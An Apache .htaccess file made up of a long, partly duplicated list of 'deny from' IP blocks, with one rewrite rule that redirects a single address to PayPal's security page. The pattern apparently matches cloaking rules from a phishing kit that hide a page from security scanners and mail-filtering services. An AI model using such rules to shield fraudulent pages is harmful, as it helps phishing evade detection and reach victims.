deny from 70.20.45.125
deny from 173.49.61.203
deny from 73.201.92.38
deny from 72.132.107.166
deny from 68.109.157.10
deny from 81.130.144.57
deny from 50.78.27.113
deny from 98.229.105.33
deny from 46.101.94.163
deny from 99.126.77.209
deny from 45.74.4.201
deny from 162.243.187.126
deny from 99.66.230.20
deny from 75.108.46.162
deny from 71.87.150.13
deny from 73.186.117.72
deny from 184.4.192.134
deny from 47.20.36.7
deny from 24.115.240.102
deny from 69.245.99.250
deny from 155.64.38.80
deny from 160.2.158.111
deny from 24.153.173.26
deny from 99.172.48.184
deny from 34.212.65.157
deny from 104.136.45.70
deny from 47.155.174.32
deny from 185.104.186.168
deny from 165.227.0.128
deny from 185.104.120.4
deny from 107.134.177.225
deny from 128.90.73.118
deny from 69.164.111.198
deny from 104.207.76.53
deny from 104.49.85.140
deny from 174.27.113.26
deny from 91.103.66.203
deny from 8.28.16.254
deny from 162.243.187.126
deny from 196.52.84.6
deny from 92.23.60.166
deny from 82.102.21.212
deny from 91.103.66.202
deny from 108.27.250.102
deny from 67.248.236.113
deny from 138.68.29.214
deny from 144.163.10.169
deny from 23.105.225.104
deny from 188.42.195.140
deny from 208.80.194.30
deny from 208.87.233.140
deny from 86.47.80.145
deny from 89.234.68.100
deny from 73.14.37.17
deny from 196.52.2.9
deny from 64.71.204.194
deny from 209.66.70.253
deny from 209.66.70.253
deny from 206.80.115.113
deny from 148.163.128.145
deny from 70.42.131.106
deny from 69.164.145.168
deny from 95.175.97.229
deny from 199.30.228.158
deny from 104.196.197.65
deny from 193.128.111.103
deny from 185.210.218.106
deny from 95.130.9.90
deny from 35.230.49.100
deny from 64.74.215.170
deny from 64.74.215.174
deny from 95.45.252.1
deny from 64.74.215.*
deny from 125.165.*.*
deny from 104.47.92.*
deny from 40.107.*.*
deny from 37.211.131.111
deny from 108.218.119.16
deny from 24.91.174.38
deny from 173.205.33.22
deny from 173.205.33.20
deny from 173.205.33.28
deny from 4.53.111.70
deny from 8.37.217.201
deny from 173.205.33.17
deny from 77.67.54.10
deny from 173.205.33.22
deny from 77.67.54.8
deny from 173.205.33.25
deny from 77.67.54.13
deny from 173.205.33.18
deny from 4.53.111.69
deny from 77.67.54.3
deny from 173.205.33.24
deny from 4.53.111.75
deny from 173.205.33.26
deny from 4.53.111.76
deny from 173.205.33.28
deny from 4.53.111.79
deny from 173.205.33.18
deny from 77.67.54.4
deny from 4.53.111.75
deny from 173.205.33.23
deny from 77.67.54.0
deny from 4.53.111.66
deny from 65.122.205.106
deny from 72.12.209.146
deny from 219.163.167.1
deny from 60.111.55.11
deny from 126.236.194.202
deny from 173.205.33.19
deny from 4.53.111.73
deny from 77.67.54.8
deny from 173.205.33.29
deny from 77.67.54.8
deny from 4.53.111.64
deny from 173.205.33.19
deny from 173.205.33.18
deny from 77.67.54.6
deny from 126.233.36.59
deny from 77.67.54.13
deny from 60.111.55.11
deny from 27.142.40.21
deny from 27.142.40.21
deny from 121.87.131.99
deny from 69.167.41.88
deny from 69.167.41.88
deny from 4.53.111.79
deny from 173.205.33.26
deny from 173.205.33.30
deny from 77.67.54.0
deny from 173.205.33.18
deny from 77.67.54.12
deny from 133.183.110.1
deny from 69.167.41.88
deny from 133.183.110.1
deny from 69.167.41.88
deny from 121.87.131.99
deny from 124.35.136.178
deny from 125.204.72.206
deny from 200.85.27.67
deny from 126.245.136.153
deny from 72.12.209.146
deny from 13.78.88.133
deny from 122.59.122.20
deny from 124.86.231.66
deny from 59.190.22.73
deny from 106.168.75.184
deny from 182.251.130.181
deny from 116.91.168.131
deny from 106.180.44.118
deny from 126.221.12.32
deny from 118.6.163.111
deny from 126.163.178.184
deny from 220.108.104.67
deny from 126.244.67.244
deny from 92.29.224.178
deny from 92.29.224.178
deny from 92.29.224.178
deny from 69.161.196.141
deny from 77.67.54.4
deny from 173.205.33.27
deny from 69.167.41.221
deny from 8.37.217.200
deny from 8.37.217.200
deny from 13.78.88.133
deny from 162.243.128.197
deny from 198.199.92.66
deny from 13.57.36.17
deny from 99.99.136.58
deny from 99.28.67.72
deny from 68.80.255.251
deny from 93.159.230.28
deny from 99.163.242.48
deny from 76.16.179.184
deny from 70.191.115.144
deny from 108.246.104.7
deny from 99.6.82.220
deny from 68.55.59.131
deny from 98.189.70.173
deny from 174.96.206.209
deny from 68.162.214.168
deny from 208.99.105.28
deny from 199.116.169.254
deny from 52.3.221.183
deny from 71.205.100.20
deny from 162.211.155.228
deny from 108.41.102.12
deny from 67.48.31.59
deny from 72.80.24.189
deny from 73.58.184.173
deny from 99.111.125.226
deny from 118.219.252.194
deny from 76.105.15.123
deny from 72.132.89.109
deny from 161.69.99.11
deny from 80.47.170.239
deny from 104.175.233.199
deny from 98.189.123.86
deny from 174.82.143.77
deny from 68.189.201.178
deny from 71.88.153.53
deny from 159.16.96.70
deny from 79.74.5.212
deny from 76.180.204.164
deny from 24.242.75.38
deny from 107.207.119.204
deny from 47.137.138.158
deny from 100.43.224.66
deny from 100.0.2.183
deny from 74.72.52.231
deny from 74.72.52.231
deny from 67.243.134.253
deny from 98.215.73.4
deny from 98.213.33.2
deny from 174.32.161.33
deny from 73.67.204.121
deny from 71.209.251.148
deny from 73.206.143.36
deny from 172.58.145.42
deny from 85.164.92.8
deny from 24.237.94.213
deny from 96.82.114.197
deny from 69.174.87.44
deny from 98.163.90.38
deny from 107.77.236.125
deny from 88.88.190.117
deny from 172.56.42.243
deny from 50.204.14.174
deny from 24.210.88.196
deny from 172.56.34.215
deny from 81.141.251.194
deny from 107.77.203.23
deny from 47.132.102.229
deny from 90.149.222.26
deny from 69.120.221.18
deny from 174.215.22.0
deny from 12.217.199.106
deny from 74.62.176.234
deny from 66.87.209.129
deny from 158.222.131.178
deny from 23.24.193.57
deny from 66.87.70.100
deny from 172.15.108.7
deny from 172.58.83.66
deny from 99.2.136.249
deny from 99.203.22.218
deny from 66.91.90.60
deny from 64.74.215.1
deny from 189.216.57.128
deny from 75.70.162.98
deny from 12.206.243.4
deny from 68.131.27.47
deny from 106.223.53.130
deny from 86.158.122.114
deny from 66.87.209.40
deny from 12.0.64.210
deny from 109.154.250.38
deny from 131.93.186.11
deny from 54.71.102.244
deny from 173.25.218.63
deny from 96.92.216.178
deny from 34.214.188.65
deny from 34.220.151.96
deny from 176.83.104.37
deny from 89.234.68.76
deny from 172.58.21.102
deny from 14.199.196.33
deny from 24.142.39.7
deny from 172.56.29.106
deny from 174.254.136.201
deny from 189.215.98.32
deny from 89.234.68.108
deny from 104.174.115.244
deny from 172.56.23.34
deny from 24.1.186.115
deny from 108.230.89.77
deny from 106.212.161.147
deny from 104.139.111.76
deny from 80.2.23.145
deny from 83.56.152.157
deny from 92.190.96.109
deny from 172.58.232.228
deny from 54.159.149.123
deny from 92.221.150.49
allow from all



RewriteEngine On
RewriteCond %{REMOTE_ADDR} ^82.20.255.107$
RewriteRule .* https://www.paypal.com/webapps/mpp/paypal-safety-and-security [R,L]
